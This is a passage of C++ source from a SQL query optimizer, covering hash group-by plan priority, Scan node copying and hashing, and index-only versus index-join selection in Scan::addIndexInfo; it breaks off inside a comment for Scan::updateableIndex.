const NAString HashGroupBy::getText() const
{
  return "hash_" + GroupByAgg::getText();
}

// Copies this node on top of a (possibly pre-allocated) derived node;
// HashGroupBy adds no members beyond GroupByAgg's.
RelExpr * HashGroupBy::copyTopNode(RelExpr *derivedNode,
                                   CollHeap* outHeap)
{
  RelExpr *result;

  if (derivedNode == NULL)
    result = new (outHeap) HashGroupBy(NULL, getOperatorType(),
                                       NULL, NULL, outHeap);
  else
    result = derivedNode;

  return GroupByAgg::copyTopNode(result, outHeap);
}

// Computes the plan priority for a hash group-by: serial plans pay a
// "risk premium" unless the operator is a partial group-by root over a
// small input.  (The body continues in the next chunk.)
PlanPriority HashGroupBy::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty();
  Lng32 degreeOfParallelism = spp->getCountOfPartitions();
  double val = 1;
  if (degreeOfParallelism <= 1)
  {
    // Don't command premium for serial hash partial groupby plan if :
    // 1. Operator is partial group by root
    // 2. process < 5K rows
    // This is to prevent optimizer choosing parallel plans for small queries.
    // The idea is either premium has been already applied for groupby leaf level
    // or leaf is running in parallel, we don't need to run root also in parallel
    if ( isAPartialGroupByRoot() &&
         CostScalar((ActiveSchemaDB()->getDefaults()).
           getAsULong(GROUP_BY_PARTIAL_ROOT_THRESHOLD)) >=
         this->getChild0Cardinality(context) )
      val = 1;
    else
      // serial plans are risky. extract an insurance premium from serial plans.
val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial();
  }

  CostScalar premium(val);
  PlanPriority result(0, 0, premium);

  // Boost the priority when the query is optimized for the first N rows.
  if (QueryAnalysis::Instance() AND
      QueryAnalysis::Instance()->optimizeForFirstNRows())
    result.incrementLevels(HASH_GROUP_BY_FIRST_N_PRIORITY,0);

  // The remaining part of the code in this function relates to parallelism
  // priority and not applicable to scalar aggregates
  if (groupExpr().isEmpty())
    return result;

  // esp parallelism priority logic does not apply to operators in dp2
  if(spp->executeInDP2())
    return result;

  // For the option of Max Degree of Parallelism we can either use the
  // value set in comp_int_9 (if positive) or we use the number of CPUs
  // if the CQD is set to -1, or feature is disabled if CQD is 0 (default).
  Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) )
  {
    // if CQD is set to -1 this mean use the number of CPUs
    maxDegree = spp->getCurrentCountOfCPUs();
  }
  if (maxDegree > 1) // CQD set to 0 means feature is OFF
  {
    // Penalize plans whose degree of parallelism is below the maximum.
    if (degreeOfParallelism < maxDegree)
      result.incrementLevels(0,-10); // need to replace with constant
  }
  //cout<<maxDegree<<"-------"<<spp->getCountOfPartitions()<<endl;
  return result;
}

// -----------------------------------------------------------------------
// member functions for class Scan
// -----------------------------------------------------------------------

// Collects into outputValues the set of values this scan can produce.
// (The body continues in the next chunk.)
void Scan::getPotentialOutputValues(ValueIdSet & outputValues) const
{
  outputValues.clear();
  //
  // Assign the set of columns that belong to the table to be scanned
  // as the output values that can be produced by this scan.
// if (potentialOutputs_.isEmpty()) { outputValues.insertList( getTableDesc()->getColumnList() ); outputValues.insertList( getTableDesc()->hbaseTSList() ); outputValues.insertList( getTableDesc()->hbaseVersionList() ); } else outputValues = potentialOutputs_; outputValues += getExtraOutputColumns(); } // Scan::getPotentialOutputValues() void Scan::getPotentialOutputValuesAsVEGs(ValueIdSet& outputs) const { outputs.clear(); ValueIdSet tempSet ; getPotentialOutputValues(tempSet); getTableDesc()->getEquivVEGCols(tempSet, outputs); } Int32 Scan::getArity() const { return 0;} NABoolean Scan::isHiveTable() const { return (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isHiveTable() : FALSE); } NABoolean Scan::isHbaseTable() const { return (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isHbaseTable() : FALSE); } NABoolean Scan::isSeabaseTable() const { return (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); } const NAString Scan::getText() const { NAString op(CmpCommon::statementHeap()); if (isSampleScan() == TRUE) op = "sample_scan "; else op = "scan "; return op + userTableName_.getTextWithSpecialType(); } HashValue Scan::topHash() { HashValue result = RelExpr::topHash(); result ^= getTableDesc(); result ^= potentialOutputs_; result ^= numIndexJoins_; return result; } NABoolean Scan::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; Scan &o = (Scan &) other; if (NOT (userTableName_ == o.userTableName_) OR NOT (getTableDesc() == o.getTableDesc()) OR NOT (potentialOutputs_ == o.potentialOutputs_) OR ((forcedIndexInfo_ OR o.forcedIndexInfo_) AND ( //just comparing the entries is probably not enough???? 
NOT (indexOnlyIndexes_.entries() == o.indexOnlyIndexes_.entries()) OR
       NOT (possibleIndexJoins_ == o.possibleIndexJoins_) OR
       NOT (numIndexJoins_ == o.numIndexJoins_))) OR
      NOT (suppressHints_ == o.suppressHints_) OR
      NOT (isSingleVPScan_ == o.isSingleVPScan_) OR
      NOT (getExtraOutputColumns() == o.getExtraOutputColumns()) OR
      NOT (samplePercent() == o.samplePercent()) OR
      NOT (clusterSize() == o.clusterSize()))
    return FALSE;

  return TRUE;
}

// Copies this Scan node on top of a (possibly pre-allocated) derived
// node.  State computed by addIndexInfo() is deliberately NOT copied.
RelExpr * Scan::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap)
{
  Scan *result;

  if (derivedNode == NULL)
    result = new (outHeap) Scan(userTableName_, getTableDesc(),
                                REL_SCAN, outHeap);
  else
    result = (Scan *) derivedNode;

  result->baseCardinality_ = baseCardinality_;
  result->potentialOutputs_ = potentialOutputs_;
  result->numIndexJoins_ = numIndexJoins_;
  result->accessOptions_ = accessOptions_;
  result->pkeyHvarList_ = pkeyHvarList_;
  result->setOptStoi(stoi_);
  result->samplePercent(samplePercent());
  result->suppressHints_ = suppressHints_;
  result->clusterSize(clusterSize());
  result->scanFlags_ = scanFlags_;
  result->setExtraOutputColumns(getExtraOutputColumns());
  result->isRewrittenMV_ = isRewrittenMV_;
  result->matchingMVs_ = matchingMVs_;
  result->hbaseAccessOptions_ = hbaseAccessOptions_;
  result->commonSubExpr_ = commonSubExpr_;

  // don't copy values that can be calculated by addIndexInfo()
  // (some callers will change selection preds, which requires recomputation)

  return RelExpr::copyTopNode(result, outHeap);
}

// Copies the index-selection state (possible index joins, index-only
// indexes, generated computed-column preds) from another Scan node.
// (The body continues in the next chunk.)
void Scan::copyIndexInfo(RelExpr *derivedNode)
{
  CMPASSERT (derivedNode != NULL AND
             derivedNode->getOperatorType() == REL_SCAN);

  Scan * scan = (Scan *)derivedNode;
  forcedIndexInfo_ = scan->forcedIndexInfo_;
  if (NOT scan->getIndexOnlyIndexes().isEmpty() OR
      scan->getPossibleIndexJoins().entries() > 0)
  {
    // first copy the possible index join info
    const LIST(ScanIndexInfo *) & ixJoins = scan->getPossibleIndexJoins();
    for (CollIndex i = 0; i < ixJoins.entries(); i++)
    {
      ScanIndexInfo * ix = new (CmpCommon::statementHeap())
ScanIndexInfo(*(ixJoins[i]));
      possibleIndexJoins_.insert(ix);
    }

    // now, copy the index descriptors
    const SET(IndexProperty *) & ixDescs = scan->getIndexOnlyIndexes();

    for (CollIndex j = 0; j <ixDescs.entries(); j++)
    {
      indexOnlyIndexes_.insert(ixDescs[j]);
    }
  }

  generatedCCPreds_ = scan->generatedCCPreds_;
}

// Clears all state computed by addIndexInfo() so it can be recomputed.
void Scan::removeIndexInfo()
{
  possibleIndexJoins_.clear();
  indexOnlyIndexes_.clear();
  indexJoinScans_.clear();
  generatedCCPreds_.clear();
  forcedIndexInfo_ = FALSE;
}

/*******************************************************
 * Generates set of IndexDesc from the set of IndexProperty
 ********************************************************/
const SET(IndexDesc *) & Scan::deriveIndexOnlyIndexDesc()
{
  indexOnlyScans_.clear();
  CollIndex ixCount = indexOnlyIndexes_.entries();
  for(CollIndex i=0; i< ixCount; i++)
  {
    indexOnlyScans_.insert(indexOnlyIndexes_[i]->getIndexDesc());
  }
  return indexOnlyScans_;
}

/*******************************************************
 * Generates set of IndexDesc from the set of ScanIndexInfo
 ********************************************************/
const SET(IndexDesc *) & Scan::deriveIndexJoinIndexDesc()
{
  indexJoinScans_.clear();
  CollIndex ijCount = possibleIndexJoins_.entries();
  for(CollIndex i=0; i< ijCount; i++)
  {
    ScanIndexInfo *ixi = possibleIndexJoins_[i];
    CollIndex uixCount = ixi->usableIndexes_.entries();
    for(CollIndex j=0; j < uixCount; j++)
    {
      if (ixi->usableIndexes_[j]->getIndexDesc())
        indexJoinScans_.insert(ixi->usableIndexes_[j]->getIndexDesc());
    }
  }
  return indexJoinScans_;
}

// Computes, once per Scan node, the set of index-only access paths and
// the list of possible index joins usable to evaluate this scan.
// (The body continues over the next several chunks.)
void Scan::addIndexInfo()
{
  // don't do this twice, return if already set
  if (NOT indexOnlyIndexes_.isEmpty() OR
      possibleIndexJoins_.entries() > 0)
    return;

  forcedIndexInfo_ = FALSE;
  const TableDesc * tableDesc = getTableDesc();
  const LIST(IndexDesc *) & ixlist = tableDesc->getIndexes();
  ValueIdSet preds = selectionPred();
  // changing back to old predicate tree:
  if ((CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) &&
      (preds.entries()))
  {
    ValueIdList
selectionPredList(preds);
    ItemExpr *inputItemExprTree =
      selectionPredList.rebuildExprTree(ITM_AND,FALSE,FALSE);
    ItemExpr * resultOld = revertBackToOldTree(CmpCommon::statementHeap(),
                                               inputItemExprTree);
    preds.clear();
    resultOld->convertToValueIdSet(preds, NULL, ITM_AND);
    doNotReplaceAnItemExpressionForLikePredicates(resultOld,preds,resultOld);
  }

  if (CmpCommon::getDefault(MTD_GENERATE_CC_PREDS) == DF_ON)
  {
    // compute predicates on computed columns from regular predicates, based
    // on the definition of the computed column. Example:
    // - regular predicate: a = 99
    // - computed column definition: "_SALT_" = HASH2PARTFUNC(a,2)
    // - computed predicate: "_SALT_" = HASH2PARTFUNC(99,2);
    ValueIdSet clusteringKeyCols(
      getTableDesc()->getClusteringIndex()->getClusteringKeyCols());
    ValueIdSet selectionPreds(preds);

    ScanKey::createComputedColumnPredicates(
      selectionPreds,
      clusteringKeyCols,
      getGroupAttr()->getCharacteristicInputs(),
      generatedCCPreds_);
  }

  // a shortcut for tables with no indexes
  if ((ixlist.entries() == 1)||
      (tableDesc->isPartitionNameSpecified()))
  {
    // that's easy, there is only one index (the base table)
    // and that index better have everything we need
    IndexJoinSelectivityEnum junk;
    // NOTE(review): the second ';' below is a stray empty statement.
    MdamFlags flag=ixlist[0]->pruneMdam(preds,TRUE,junk);;
    IndexProperty * ixProp = new(CmpCommon::statementHeap())
      IndexProperty(ixlist[0], flag);
    indexOnlyIndexes_.insert(ixProp);
    return;
  }

  // all the value ids that are required by the scan and its parents
  ValueIdSet requiredValueIds(getGroupAttr()->getCharacteristicOutputs());

  // VEGPreds can have two forms, an A IS NOT NULL form and an A=B form
  // when expanded in the generator. If an index does not provide a
  // VEG member that the base table provides, a VEGPredicate could be
  // covered by the index in its IS NOT NULL form (checking a char. input
  // whether it is not null). To avoid this bug, add all the base cols
  // that contribute to VEGPredicates as explicitly required values.
  addBaseColsFromVEGPreds(requiredValueIds);

  // using old predicate tree:
  if ((CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) &&
      (preds.entries()))
  {
    requiredValueIds += preds;
  }
  else
    // selection predicates are also required, add them to requiredValueIds
    requiredValueIds += selectionPred();

  // a list of VEGReferences to the clustering key column(s)
  ValueIdSet clusteringKeyColumns;

  // some helper variables
  ValueIdList clusteringKeyColList;

  // a set of join predicates between indexes (same for all indexes)
  ValueIdSet indexJoinPreds;

  // ---------------------------------------------------------------------
  // find out the subset of values that are always covered
  // ---------------------------------------------------------------------

  // get the clustering key columns and transform them into VEGies
  CMPASSERT(tableDesc);
  tableDesc->getEquivVEGCols(
    tableDesc->getClusteringIndex()->getIndexKey(),
    clusteringKeyColList);
  clusteringKeyColumns = clusteringKeyColList;

  // get the VEGPredicates from the list of VEGReferences; they are
  // the join predicates between indexes (who all contain the clustering key)
  for (ValueId x = clusteringKeyColumns.init();
       clusteringKeyColumns.next(x);
       clusteringKeyColumns.advance(x))
  {
    // clustering key columns must be VEGReferences
    CMPASSERT(x.getItemExpr()->getOperatorType() == ITM_VEG_REFERENCE);

    if (((VEGReference *) x.getItemExpr())->getVEG()->getSpecialNulls())
      ((VEGReference *) x.getItemExpr())
        ->getVEG()->getVEGPredicate()->setSpecialNulls(TRUE);

    // find the corresponding VEGPredicate and add it to the join preds
    indexJoinPreds += ((VEGReference *) x.getItemExpr())->
      getVEG()->getVEGPredicate()->getValueId();
  }

  const NABoolean updatingCol = tableDesc->getColUpdated().entries() > 0;
  const NABoolean unlimitedIndexJoinsAllowed =
    ((ActiveControlDB()->getRequiredShape() AND
      ActiveControlDB()->getRequiredShape()->getShape() AND
      NOT ActiveControlDB()->getRequiredShape()->getShape()->isCutOp()) OR
(getGroupAttr()->isEmbeddedUpdateOrDelete()) OR
     (getGroupAttr()->isStream())
    );
  const TableAnalysis * tAnalysis = getTableDesc()->getTableAnalysis();

  // with this CQD value set, try to consider minimum indexes possible
  // if ixProp is no better than any of indexOnlyIndexes_ - don't add
  // it. If ixProp is better than some of this set - remove them.
  NABoolean tryToEliminateIndex =
    CURRSTMT_OPTDEFAULTS->indexEliminationLevel() == OptDefaults::AGGRESSIVE
    AND NOT unlimitedIndexJoinsAllowed
    AND tAnalysis;

  CostScalar indexEliminationThreshold =
    ActiveSchemaDB()->getDefaults().getAsLong(INDEX_ELIMINATION_THRESHOLD);

  NABoolean printIndexElimination =
    CmpCommon::getDefault(NSK_DBG_PRINT_INDEX_ELIMINATION) == DF_ON &&
    CmpCommon::getDefault(NSK_DBG) == DF_ON;

  ostream &out = CURRCONTEXT_OPTDEBUG->stream();
  if ( printIndexElimination ) {
    out << endl << "call addIndexInfo()" << endl;
    out << "tryToEliminateIndex=" << (Lng32)tryToEliminateIndex << endl;
  }

  // ---------------------------------------------------------------------
  // For each index, check whether it provides any useful values
  // ---------------------------------------------------------------------
  for (CollIndex indexNo = 0; indexNo < ixlist.entries(); indexNo++)
  {
    IndexDesc *idesc = ixlist[indexNo];

    NABoolean dummy; // halloweenProtection is decided using updateableIndex
    // in GU::normalizeNode. Here this parameter is not used.
    // Determine if this index can be used for a scan during an update.
    if (updatingCol AND NOT updateableIndex(idesc, preds, dummy))
      continue;

    ValueIdSet indexColumns(idesc->getIndexColumns());

    ValueIdSet referencedInputs;
    ValueIdSet coveredSubexpr;
    ValueIdSet unCoveredExpr;
    GroupAttributes indexOnlyGA;
    NABoolean indexOnlyScan;

    // make group attributes for an index scan
    indexOnlyGA.addCharacteristicOutputs(idesc->getIndexColumns());
    indexOnlyGA.addCharacteristicOutputs(extraOutputColumns_);

    // does the index cover all required values, and if not, which
    // ones does it cover and which ones are not covered
    indexOnlyScan = requiredValueIds.isCovered(
      getGroupAttr()->getCharacteristicInputs(),
      indexOnlyGA,
      referencedInputs,
      coveredSubexpr,
      unCoveredExpr);

    // if this is a sample scan (currently these are only CLUSTER
    // sampling scans) then do not choose index only scan. Also,
    // due to an artifact of sampling, the 'isCovered' test above
    // will not return TRUE even for the ClusteringIndex, so force
    // it to be true for the ClusteringIndex. Note that
    // ClusterIndex means that this is the basetable access path.
    //
    if (isSampleScan())
    {
      if (idesc->isClusteringIndex())
      {
        // Force it to be TRUE for the basetable access path.
        // This overrides the value of 'indexOnlyScan' produced
        // above since for sample scans, the isCovered test will
        // always fail, even for the basetable.
        //
        indexOnlyScan = TRUE;
      }
      else
      {
        indexOnlyScan = FALSE;
      }
    }

    // if the user specified IN EXCLUSIVE MODE option for this select,
    // then do not choose index only scan. This is needed so the base
    // table row could be locked in exclusive mode.
    if ((indexOnlyScan) &&
        (! idesc->isClusteringIndex()) &&
        (accessOptions().lockMode() == EXCLUSIVE_))
      indexOnlyScan = FALSE;

    //pruneMdam() returns a flag indicating if the index would have
    //has good enough key access for MDAM access to be viable. For index
    //join indexes it also returns a IndexJoinSelectivityEnum that
    //indicates if the index join is going to exceed the cost of just
    //scanning the base table.
    if (indexOnlyScan)
    {
      // this index supplies all the info we need, consider
      // it for an index only scan later
      IndexJoinSelectivityEnum junk;
      MdamFlags flag=idesc->pruneMdam(preds,TRUE,junk);
      IndexProperty * ixProp = new(CmpCommon::statementHeap())
        IndexProperty(idesc, flag);

      if (tryToEliminateIndex)
      {
        // with this CQD value set, try to consider minimum indexes possible
        // if ixProp is no better than any of indexOnlyIndexes_ - don't add
        // it. If ixProp is better than some of this set - remove them.
        ixProp->updatePossibleIndexes(indexOnlyIndexes_, this);
      }
      else
        indexOnlyIndexes_.insert(ixProp);
    }
    else
    {
      GroupAttributes indexGA;
      ValueIdSet ijCoveredPredicates;
      if(numIndexJoins_ < MAX_NUM_INDEX_JOINS AND
         NOT unlimitedIndexJoinsAllowed)
      {
        //Is any of the predicates covered by key columns of the
        //alternate index?
        ValueIdList userKeyColumns(idesc->getIndexKey());
        CollIndex numSecondaryIndexKey =
          idesc->getNAFileSet()->getCountOfColumns(
            TRUE,   // key columns only
            TRUE,   // user-specified key columns only
            FALSE,  // don't exclude system columns
            FALSE); // don't exclude salt/divisioning columns
        CollIndex numClusteringKey =
          userKeyColumns.entries() - numSecondaryIndexKey;
        if(NOT idesc->isUniqueIndex())
        {
          // strip the trailing clustering-key columns from the key list
          CollIndex entry = userKeyColumns.entries() -1;
          for(CollIndex i=0;i<numClusteringKey;i++)
          {
            userKeyColumns.removeAt(entry);
            entry--;
          }
        }
        indexGA.addCharacteristicOutputs(userKeyColumns);
        ValueIdSet ijReferencedInputs;
        ValueIdSet ijUnCoveredExpr;
        ValueId vid;
        ValueIdSet disjuncts;

        // Multi-Index OR optimization requires that the index information
        // is maintained for disjuncts as well. So here we check if the
        // predicate is of the form A OR B OR C. If it is, then the top
        // operator is the OR operator. The optimization is considered only
        // in this case. So if the predicate has an OR on top of the item
        // expression, then we check if the disjuncts are covered by the
        // index.
if (preds.entries() == 1)
        {
          preds.getFirst(vid);
          if (vid.getItemExpr()->getOperatorType() == ITM_OR)
          {
            vid.getItemExpr()->convertToValueIdSet(disjuncts,
                                                   NULL, ITM_OR, FALSE);
          }
          else
            disjuncts=preds;
        }
        else
          disjuncts=preds;

        disjuncts.isCovered(
          getGroupAttr()->getCharacteristicInputs(),
          indexGA,
          ijReferencedInputs,
          ijCoveredPredicates,
          ijUnCoveredExpr);

        // we only care about predicates that are entirely covered,
        // parts of predicates (like constants) that are covered
        // don't help in this context
        ijCoveredPredicates.intersectSet(disjuncts);
      }

      // This index does not provide all required values.
      // However, it might be useful to join this index with another
      // one (most likely the clustering index) to get the rest
      // of the required values. If this is promising at all, then
      // add this index to a list of possible index joins.
      // In that list of possible index joins, group all indexes
      // that provide the same set of output values (but different
      // orders) together.
      if (numIndexJoins_ < MAX_NUM_INDEX_JOINS AND
          (unlimitedIndexJoinsAllowed OR NOT ijCoveredPredicates.isEmpty()))
      {
        // changing back to old predicate tree:
        ValueIdSet selectionpreds;
        if((CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON ) &&
           (selectionPred().entries()))
        {
          ValueIdList selectionPredList(selectionPred());
          ItemExpr *inputItemExprTree =
            selectionPredList.rebuildExprTree(ITM_AND,FALSE,FALSE);
          ItemExpr * resultOld =
            revertBackToOldTree(CmpCommon::statementHeap(),
                                inputItemExprTree);
          resultOld->convertToValueIdSet(selectionpreds, NULL, ITM_AND);
          doNotReplaceAnItemExpressionForLikePredicates(resultOld,
                                                        selectionpreds,
                                                        resultOld);
        }

        // For now, only consider indexes that covers one of the selection
        // predicates unless control query shape is in effect.
        // NOTE: we should also consider indexes that potentially
        // could provide an interesting order or partitioning. To do
        // that, we would have to check whether their first key column
        // or any of their partitioning key columns is used.

        // For exclusive mode, any index can be called a usable index of
        // of another, only if it produces the same characteristic
        // outputs as the main index, and also both indexes have the same
        // uncovered expressions. This is because, in exclusive mode the
        // base (clustering key) index must always be read even if the
        // alternate index is index only, because the locks on the
        // base index are required for exclusive mode.
        // We can test the index only case with exclusive mode by
        // requiring the uncovered expressions to be the same
        // (both would be NULL for index only).

        // we now have the following information ready:
        // - coveredSubexpr are the values that the index can deliver
        //   (+ clustering key columns)
        // - unCoveredExpr are the values that the right child of the
        //   index join should deliver (+ clustering key values)
        // - we know the clustering key VEGies, whose VEGPredicates
        //   serve as join predicates between the indexes
        // - we can find out the selection predicates covered
        //   by the index by intersecting them with coveredSubexpr

        ValueIdSet newOutputsFromIndex(coveredSubexpr);
        ValueIdSet newIndexPredicates(coveredSubexpr);
        ValueIdSet newOutputsFromRightScan(unCoveredExpr);

        newOutputsFromIndex += clusteringKeyColumns;
        if(CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON )
        {
          newOutputsFromIndex -= selectionpreds;
        }
        else
          newOutputsFromIndex -= selectionPred();

        newOutputsFromIndex -= getGroupAttr()->
          getCharacteristicInputs();

        if(CmpCommon::getDefault(RANGESPEC_TRANSFORMATION) == DF_ON )
        {
          newIndexPredicates.intersectSet(selectionpreds);
          newOutputsFromRightScan -= selectionpreds;
        }
        else
        {
          newIndexPredicates.intersectSet(selectionPred());
          newOutputsFromRightScan -= selectionPred();
        }
        newOutputsFromRightScan += clusteringKeyColumns;

        NABoolean idescAbsorbed = FALSE;

        // does another index have the same covered values?
        for (CollIndex i = 0; i < possibleIndexJoins_.entries(); i++)
        {
          NABoolean isASupersetIndex =
            possibleIndexJoins_[i]->outputsFromIndex_.contains(
              newOutputsFromIndex);
          NABoolean isASubsetIndex =
            newOutputsFromIndex.contains(
              possibleIndexJoins_[i]->outputsFromIndex_) ;
          NABoolean isASuperOrSubsetIndex =
            isASupersetIndex || isASubsetIndex;
          NABoolean produceSameIndexOutputs =
            isASupersetIndex && isASubsetIndex;

          if ((possibleIndexJoins_[i]->inputsToIndex_ == referencedInputs) &&
              ((accessOptions().lockMode() != EXCLUSIVE_) ||
               possibleIndexJoins_[i]->outputsFromRightScan_ ==
                 newOutputsFromRightScan))
          {
            ScanIndexInfo *ixi = possibleIndexJoins_[i];
            IndexJoinSelectivityEnum isGoodIndexJoin = INDEX_JOIN_VIABLE;
            MdamFlags mdamFlag =
              idesc->pruneMdam(ixi->indexPredicates_,FALSE,
                               isGoodIndexJoin,
                               getGroupAttr(),&(ixi->inputsToIndex_));
            IndexProperty * ixProp;
            if(getGroupAttr()->getInputLogPropList().entries() >0)
              ixProp = new(CmpCommon::statementHeap())
                IndexProperty(idesc, mdamFlag, isGoodIndexJoin,
                              (getGroupAttr()->getInputLogPropList())[0]);
            else
              ixProp = new(CmpCommon::statementHeap())
                IndexProperty(idesc, mdamFlag, isGoodIndexJoin);

            if ( !tryToEliminateIndex ||
                 idesc->indexHintPriorityDelta() > 0)
            {
              if ( produceSameIndexOutputs &&
                   ixi->indexPredicates_ == newIndexPredicates )
              {
                ixi->usableIndexes_.insert(ixProp);
                idescAbsorbed = TRUE;
                break;
              }
            }
            else
            {
              CANodeId tableId = tAnalysis->getNodeAnalysis()->getId();

              // keep the index that provides the maximal coverage of the
              // predicate. Do this only when the output from one index is
              // the super set of the other. For example (a,b) in I1
              // (CREATE INDEX T1 on T(a, b)) is a superset of (a) in I2
              // (CREATE INDEX T2 on T(a)).
              if ( isASuperOrSubsetIndex && !produceSameIndexOutputs )
              {
                // Score the index's coverage by computing the remaining length of the
                // key columns not covering the index predicates. The one with remaining
                // length of 0 is the best.
ValueIdSet indexCols;
                newIndexPredicates.findAllReferencedIndexCols(indexCols);

                Lng32 currentPrefixLen =
                  idesc->getIndexKey().findPrefixLength(indexCols);
                Lng32 currentSuffixLen =
                  idesc->getIndexKey().entries() - currentPrefixLen;

                Lng32 previousPrefixLen =
                  ixi->usableIndexes_[0]->getIndexDesc()
                    ->getIndexKey().findPrefixLength(indexCols);
                Lng32 previousSuffixLen =
                  ixi->usableIndexes_[0]->getIndexDesc()
                    ->getIndexKey().entries() - previousPrefixLen;

                // shorter uncovered suffix == better predicate coverage
                if ( currentSuffixLen < previousSuffixLen )
                {
                  if ( printIndexElimination )
                    out << "Eliminate index join heuristics 1: remove "
                        << ixi->usableIndexes_[0]->getIndexDesc()
                             ->getExtIndexName().data()
                        << endl;

                  ixi = new (CmpCommon::statementHeap())
                    ScanIndexInfo(referencedInputs, newOutputsFromIndex,
                                  newIndexPredicates, indexJoinPreds,
                                  newOutputsFromRightScan,
                                  idesc->getIndexKey(), ixProp);
                  possibleIndexJoins_[i] = ixi;
                }
                else
                {
                  // do nothing. The current index is less useful.
                  if ( printIndexElimination )
                    out << "Eliminate index join heuristics 1: remove "
                        << idesc->getExtIndexName().data() << endl;
                }

                idescAbsorbed = TRUE;
              }
              else
              // if no index is a prefix of the other and the two do not produce
              // same output, pick one with high selectivity.
              if ( !isASuperOrSubsetIndex && !produceSameIndexOutputs )
              {
                // two indexes do not produce the same outputs. Select
                // one with the most selectivity.
                CostScalar rowsToScan;
                CostScalar currentDataAccess =
                  computeCpuResourceForIndexJoin(tableId, idesc,
                                                 newIndexPredicates,
                                                 rowsToScan);
                if ( rowsToScan > indexEliminationThreshold )
                  break;

                CostScalar previousDataAccess =
                  computeCpuResourceForIndexJoin(
                    tableId, ixi->usableIndexes_[0]->getIndexDesc(),
                    ixi->indexPredicates_, rowsToScan);

                if ( currentDataAccess < previousDataAccess )
                {
                  if ( printIndexElimination )
                    out << "Eliminate index join heuristics 2: remove "
                        << ixi->usableIndexes_[0]->getIndexDesc()
                             ->getExtIndexName().data()
                        << endl;

                  ixi = new (CmpCommon::statementHeap())
                    ScanIndexInfo(referencedInputs, newOutputsFromIndex,
                                  newIndexPredicates, indexJoinPreds,
                                  newOutputsFromRightScan,
                                  idesc->getIndexKey(), ixProp);
                  possibleIndexJoins_[i] = ixi;
                }
                else
                {
                  // do nothing. The current index is less useful.
                  if ( printIndexElimination )
                    out << "Eliminate index join heuristics 2: remove "
                        << idesc->getExtIndexName().data() << endl;
                }

                idescAbsorbed = TRUE;
              }
              else
              {
                // must be produceSameIndexOutputs when reach here.
                CMPASSERT(produceSameIndexOutputs);

                // Another index produces the same characteristic
                // outputs. Combine the two indexes in a single
                // scan. Add this index to the list of indexes,
                // everything else should be set already
                if ( possibleIndexJoins_[i]->indexPredicates_ ==
                       newIndexPredicates &&
                     ixProp->compareIndexPromise(ixi->usableIndexes_[0]) ==
                       MORE )
                {
                  if ( printIndexElimination )
                    out << "Eliminate index join heuristics 0: remove "
                        << ixi->usableIndexes_[0]->getIndexDesc()
                             ->getExtIndexName().data()
                        << endl;

                  ixi = new (CmpCommon::statementHeap())
                    ScanIndexInfo(referencedInputs, newOutputsFromIndex,
                                  newIndexPredicates, indexJoinPreds,
                                  newOutputsFromRightScan,
                                  idesc->getIndexKey(), ixProp);
                  possibleIndexJoins_[i] = ixi;

                  idescAbsorbed = TRUE;
                }
              }

              break;
            } // try to eliminate this index from consideration
          } // found another index join with the same covered values
        } // for loop: does another index join have the same covered values?
if (!idescAbsorbed)
        {
          // create a new index info struct and add this into the
          // possible index joins list
          IndexJoinSelectivityEnum isGoodIndexJoin = INDEX_JOIN_VIABLE;
          MdamFlags mdamFlag =
            idesc->pruneMdam(newIndexPredicates,FALSE,
                             isGoodIndexJoin,
                             getGroupAttr(),&referencedInputs);
          IndexProperty * ixProp =
            (getGroupAttr()->getInputLogPropList().entries() >0)
            ? new(CmpCommon::statementHeap())
                IndexProperty(idesc, mdamFlag, isGoodIndexJoin,
                              (getGroupAttr()->getInputLogPropList())[0])
            : new(CmpCommon::statementHeap())
                IndexProperty(idesc, mdamFlag, isGoodIndexJoin);

          ScanIndexInfo *ixi = new (CmpCommon::statementHeap())
            ScanIndexInfo(referencedInputs, newOutputsFromIndex,
                          newIndexPredicates, indexJoinPreds,
                          newOutputsFromRightScan, idesc->getIndexKey(),
                          ixProp);

          possibleIndexJoins_.insert(ixi);
        } // !idescAbsorbed
      } // index delivers new values
    } // not indexOnly access
  } // for each index

  if ( printIndexElimination ) {
    out << "# of index join scans=" << possibleIndexJoins_.entries() << endl;
    out << "# of index only scans=" << indexOnlyIndexes_.entries() << endl;
    out << "==================" << endl;
  }

  // there should always be at least one index-only access path
  CMPASSERT(indexOnlyIndexes_.entries() > 0);
} // Scan::addIndexInfo

// Sets table name/desc/base cardinality on this Scan from the analysis
// info attached to the given CANodeId; no-op when analysis is missing.
void Scan::setTableAttributes(CANodeId nodeId)
{
  NodeAnalysis * nodeAnalysis = nodeId.getNodeAnalysis();

  if (nodeAnalysis == NULL)
    return;

  TableAnalysis * tableAnalysis = nodeAnalysis->getTableAnalysis();

  if (tableAnalysis == NULL)
    return;

  TableDesc * tableDesc = tableAnalysis->getTableDesc();

  const CorrName& name = tableDesc->getNATable()->getTableName();

  setTableName((CorrName &)name);
  setTableDesc(tableDesc);
  setBaseCardinality(MIN_ONE (tableDesc->getNATable()->getEstRowCount())) ;
}

// Decides whether index idx may drive the scan of an UPDATE, and whether
// doing so requires Halloween protection.  (The full contract is spelled
// out in the comment that continues in the next chunk.)
NABoolean Scan::updateableIndex(IndexDesc *idx, ValueIdSet& preds,
                                NABoolean & needsHalloweenProtection)
{
  //
  // Returns TRUE if the index (idx) can be used for a scan during an UPDATE.
// Returns TRUE with needsHalloweenProtection also set to TRUE, if the index
// needs a blocking sort for Halloween protection
// Otherwise, returns FALSE to prevent use of this index.
// Using the index in this case requires Halloween protection, but is likely
// inefficient since there are no useful preds on the index key columns, so
// we don't add this index to list of candidates.
//
// The conditions of when this index returns TRUE can also be expressed as
